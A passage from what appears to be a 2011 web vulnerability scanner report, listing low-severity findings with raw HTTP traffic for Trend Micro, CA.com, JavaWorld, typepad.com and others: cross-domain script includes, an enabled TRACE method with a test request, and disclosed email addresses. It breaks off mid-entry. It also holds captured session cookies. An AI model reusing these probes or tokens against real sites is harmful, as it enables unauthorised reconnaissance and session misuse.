<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8" />
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...

13.15. https://store.trendmicro.com/DRHM/store

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.trendmicro.com
Path:   /DRHM/store

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /DRHM/store?Action=DisplayCheckoutPaymentPage&SiteID=tmamer&Locale=en_US HTTP/1.1
Host: store.trendmicro.com
Connection: keep-alive
Referer: https://store.trendmicro.com/store?Action=DisplayPage&Locale=en_US&SiteID=tmamer&id=ShoppingCartPage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ORA_WX_SESSION="10.2.2.129:260-0#0"; JSESSIONID=74CA66C6686E81F96F871B79152A151D; VISITOR_ID=971D4E8DFAED43672BD9EDEF2E7090049E8F29A9B6FF10E6; BIGipServerp-drh-dc2pod9-pool1-active=2164392458.260.0000; __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; __qca=P0-1869591235-1315350993064; bn_u=6923713914570485926; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%22%2C%22r%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Ftrend-micro-researchers-identify-vulnerability-in-hotmail%2F%22%2C%22t%22%3A1315351267113%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Fcategory%2Fpharming%2F%22%2C%22l%22%3A%22Pharming%22%2C%22de%22%3A%7B%22su%22%3A%22Malware%20blog%20by%20TrendLabs%20provides%20internet%20security%20research%20information%20on%20worms%20viruses%20trojans%20adware%20and%20other%20internet%20threats%20and%20discusses%20how%20to%20protect%20your%20computer%20data%20from%20being%20hijacked%22%2C%22ti%22%3A%22Malware%20Blog%20%7C%20TrendLabs%20-%20by%20Trend%20Micro%22%2C%22nw%22%3A1544%2C%22nl%22%3A162%7D%7D

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Connection: Keep-Alive
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=24051346139,0)
Date: Tue, 06 Sep 2011 18:21:15 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app96
Content-Length: 56184


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<!-- begin site specific javascript -->


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/eddy/cm/multimedia/commonFunctions.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/OT_files/tmamer_globalTrial.js"></script>


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/OT_files/tmamer_CheckoutPaymentAnonymousPage_contentBody.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/jqCookie.js"></script>
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/browser_os_detect.js"></script>
...[SNIP]...
</style>

<script src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/js/jquery.maskedinput-1.1.4.pack.js" type="text/javascript"></script>
...[SNIP]...
<div id="dr_verisign" title="This site chose VeriSign SSL for secure e-commerce and confidential communications.">
           <script src=https://seal.verisign.com/getseal?host_name=store.trendmicro.com&size=M&use_flash=YES&use_transparent=YES&lang=en></script>
...[SNIP]...
</script>


<script language="javascript1.2" src="//libs.coremetrics.com/eluminate.js" type="text/javascript">
</script>
...[SNIP]...
<!-- ####################################### -->


<script src="https://display.digitalriver.com/?aid=244&tax=trend_micro" type="text/javascript" defer="defer"></script>
...[SNIP]...

13.16. https://store.trendmicro.com/store

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.trendmicro.com
Path:   /store

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /store?Action=DisplayPage&Locale=en_US&SiteID=tmamer&id=ShoppingCartPage HTTP/1.1
Host: store.trendmicro.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ORA_WX_SESSION="10.2.2.129:260-0#0"; JSESSIONID=74CA66C6686E81F96F871B79152A151D; VISITOR_ID=971D4E8DFAED43672BD9EDEF2E7090049E8F29A9B6FF10E6; BIGipServerp-drh-dc2pod9-pool1-active=2164392458.260.0000; __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.2.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bn_u=6923713914570485926; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fhome%2Fhome-user%2F%22%2C%22r%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fhome%2F%22%2C%22t%22%3A1315350861448%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fwww.trendsecure.com%2Fcommonapi%2Fredirect.php%3Fl%3Den-US%26a%3DMT-EN%22%2C%22l%22%3A%22My%20Account%20Log-In%5Cn%22%2C%22de%22%3A%7B%22su%22%3A%22Free%20online%20virus%20scan%20and%20antivirus%20trial%20downloads.%20Get%20it%20only%20from%20TrendMicro.com!%22%2C%22ti%22%3A%22Home%20%26%20Home%20Office%20%7C%20Internet%20Security%20Software%22%2C%22nw%22%3A253%2C%22nl%22%3A225%7D%7D; fsr.s={"v":1,"rid":"1315350793273_559343","pv":2,"to":3.5,"c":"http://us.trendmicro.com/us/home/home-user/","lc":{"d1":{"v":2,"s":true}},"cd":1,"sd":1,"f":1315350865822}

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Connection: Keep-Alive
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=101360405795,0)
Date: Tue, 06 Sep 2011 18:15:31 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app96
Content-Length: 95454


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<!-- begin site specific javascript -->


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/eddy/cm/multimedia/commonFunctions.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/OT_files/tmamer_globalTrial.js"></script>


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/OT_files/tmamer_ShoppingCartPage_contentBody.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/jqCookie.js"></script>
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/browser_os_detect.js"></script>
...[SNIP]...
<!-- Begin Hiconversion Head Enabling. Do NOT move. Must come directly before the closing head tag -->
               <script id='hiconversion_head_include' type='text/javascript' src='https://www.hiconversion.com/enabling/update.jsp?external=&version=1.0'></script>
...[SNIP]...
<div id="dr_verisign">
   <script src="https://seal.verisign.com/getseal?host_name=store.trendmicro.com&size=M&use_flash=YES&use_transparent=YES&lang=en"></script>
...[SNIP]...
</script>


<script language="javascript1.2" src="//libs.coremetrics.com/eluminate.js" type="text/javascript">
</script>
...[SNIP]...
<!-- ####################################### -->


<script src="https://display.digitalriver.com/?aid=244&tax=trend_micro" type="text/javascript" defer="defer"></script>
...[SNIP]...

13.17. https://www.ca.com/us/register/createprofile.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ca.com
Path:   /us/register/createprofile.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/register/createprofile.aspx?returnURL=/us/default.aspx HTTP/1.1
Host: www.ca.com
Connection: keep-alive
Referer: http://www.ca.com/us/default.aspx
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351461237:ss=1315351389192

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 18:25:47 GMT
Content-Length: 458334


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<scri
...[SNIP]...
<link href="/~/media/css/legacy-global.css" rel="stylesheet" type="text/css" media="screen" />-->


<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="https://secure.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...

13.18. https://www.ca.com/us/register/forgotpassword.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ca.com
Path:   /us/register/forgotpassword.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/register/forgotpassword.aspx HTTP/1.1
Host: www.ca.com
Connection: keep-alive
Referer: https://www.ca.com/us/register/login.aspx?TYPE=33554433&REALMOID=06-1b8e166c-7b99-4dde-8e8e-3d72b8676926&GUID=0&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-ceh3eHBrhdBGtkDbzVMc19jsrO5glB4Pb5vXNZLDdm9J8L7U83j3tj9%2bMS6GITKt&TARGET=-SM-https%3a%2f%2fwww%2eca%2ecom%2fregister%2fssoauthenticate%2easpx%3fCATARGET%3dLVNNLUhUVFBTOi8vY29tbXVuaXRpZXMuY2EuY29tL2MvcG9ydGFsL2xvZ2luP3BfbF9pZD0xMDE0MQ%3d%3d
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351628610:ss=1315351389192; target=https%3a//www.ca.com/register/ssoauthenticate.aspx%3freturnURL=L3VzL2RlZmF1bHQuYXNweA==

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 18:27:17 GMT
Content-Length: 29060


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<meta http-
...[SNIP]...
<link href="/~/media/css/legacy-global.css" rel="stylesheet" type="text/css" media="screen" />-->


<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="https://secure.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...

13.19. https://www.ca.com/us/register/login.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ca.com
Path:   /us/register/login.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/register/login.aspx?TYPE=33554433&REALMOID=06-87393857-93f3-4215-801a-7f71d6dfdcde&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=rs-prod-communities-wa&TARGET=-SM-HTTPS%3a%2f%2fcommunities%2eca%2ecom%2fc%2fportal%2flogin%3fp_l_id%3d10141 HTTP/1.1
Host: www.ca.com
Connection: keep-alive
Referer: http://www.ca.com/us/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351414553:ss=1315351389192; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: SMTRYNO=false; domain=ca.com; expires=Tue, 06-Sep-2011 18:23:42 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 18:23:42 GMT
Content-Length: 36056


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<meta htt
...[SNIP]...
<link href="/~/media/css/legacy-global.css" rel="stylesheet" type="text/css" media="screen" />-->


<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="https://secure.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...

13.20. http://www.javalobby.org/articles/acegisecurity/part1.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.javalobby.org
Path:   /articles/acegisecurity/part1.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /articles/acegisecurity/part1.jsp HTTP/1.1
Host: www.javalobby.org
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=acegisecurity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Resin/3.2.1
Content-Type: text/html; charset=ISO-8859-1
Date: Tue, 06 Sep 2011 17:55:34 GMT
Content-Length: 33566


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
   <head>

       <title>Securing Your Java Applications - Acegi Security Style</title>
<meta http-equiv="content-type"
...[SNIP]...
</div>
   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

13.21. http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.javaworld.com
Path:   /javaworld/jw-10-2007/jw-10-acegi2.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /javaworld/jw-10-2007/jw-10-acegi2.html HTTP/1.1
Host: www.javaworld.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=acegisecurity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:45:52 GMT
Server: Apache/2.2.3 (CentOS)
Accept-Ranges: bytes
Cache-Control: public, max-age=600
Cneonction: close
Content-Type: text/html; charset=UTF-8
Content-Length: 67949


<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...
</script>
<script type="text/javascript" src="http://api.demandbase.com/api/v1/ip.json?token=08b8cb24471b1cc051c579449c9641156b959aaa&callback=OPG.Demandbase.dbase_parse"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
</script>
<script language="javascript" src="http://widgets.dzone.com/links/widgets/zoneit.js"></script>
...[SNIP]...
</form>
       <script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</h2>
<script type="text/javascript" src="http://jlinks.industrybrains.com/jsct?sid=93&ct=JAVAWORLD_HP_ROS&num=1&layt=10&fmt=simp&tr=premium"></script>
...[SNIP]...
<div style="padding:6px; background-color:#ededed; border:1px solid #D6D3D3; width:634px; margin-top:12px;">
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<!--//HARDCODED BY JCROCI 6/25/11 -->
<script type="text/javascript" src="http://jlinks.industrybrains.com/jsct?sid=93&ct=JAVAWORLD_HP_ROS&num=5&layt=10&fmt=simp"></script>
...[SNIP]...
<!--bhauck 3/7/2010-->
   <script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...

14. TRACE method is enabled

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.typepad.com
Path:   /

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

Request

TRACE / HTTP/1.0
Host: www.typepad.com
Cookie: 789027bdcab58768

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 20:52:09 GMT
Server: Apache
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.typepad.com
Cookie: 789027bdcab58768
X-Forwarded-For: 50.23.123.106, 10.17.141.102
X-6a-Remote: 10.17.141.102:39818
X-6a-Bticks: 0035524
X-6a-BTime: 632813362
Connection: keep-alive


15. Email addresses disclosed
There are 9 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


15.1. http://blog.trendmicro.com/wp-content/plugins/what-would-seth-godin-do/jquery.cookie.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.trendmicro.com
Path:   /wp-content/plugins/what-would-seth-godin-do/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

Request

GET /wp-content/plugins/what-would-seth-godin-do/jquery.cookie.js HTTP/1.1
Host: blog.trendmicro.com
Proxy-Connection: keep-alive
Referer: http://blog.trendmicro.com/?p=12640
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; bn_u=6923713914570485926; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fsearch%2F%3Fq%3Dxss%26search.x%3D2%26search.y%3D10%26search%3Dsearch%22%2C%22r%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fhome%2F%22%2C%22t%22%3A1315350988973%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%3Fp%3D12640%22%2C%22l%22%3A%22XSS%20Methods%20Also%20Seen%20Being%20Used%20in%20Mass%20Compromises%22%2C%22rb%22%3A%221%22%2C%22ri%22%3A%221%22%2C%22de%22%3A%7B%22ti%22%3A%22Search%22%2C%22nw%22%3A393%2C%22nl%22%3A141%7D%7D

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Content-Type: application/x-javascript
Last-Modified: Mon, 22 Aug 2011 01:04:54 GMT
ETag: "1a4489-e81-4ab0daab8b980"
X-Varnish: 1940592412
Cache-Control: max-age=14400
Expires: Tue, 06 Sep 2011 22:16:27 GMT
Date: Tue, 06 Sep 2011 18:16:27 GMT
Content-Length: 3713
Connection: close
Vary: Accept-Encoding

/*jslint browser: true */ /*global jQuery: true */

/**
* jQuery Cookie plugin
*
* Copyright (c) 2010 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opens
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given key.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String key The key of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function (key, value, options) {

// key and at least value given, set cookie...
if (arguments.length >
...[SNIP]...

15.2. http://pastebin.com/bq8xJPMn

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pastebin.com
Path:   /bq8xJPMn

Issue detail

The following email address was disclosed in the response:

Request

GET /bq8xJPMn HTTP/1.1
Host: pastebin.com
Proxy-Connection: keep-alive
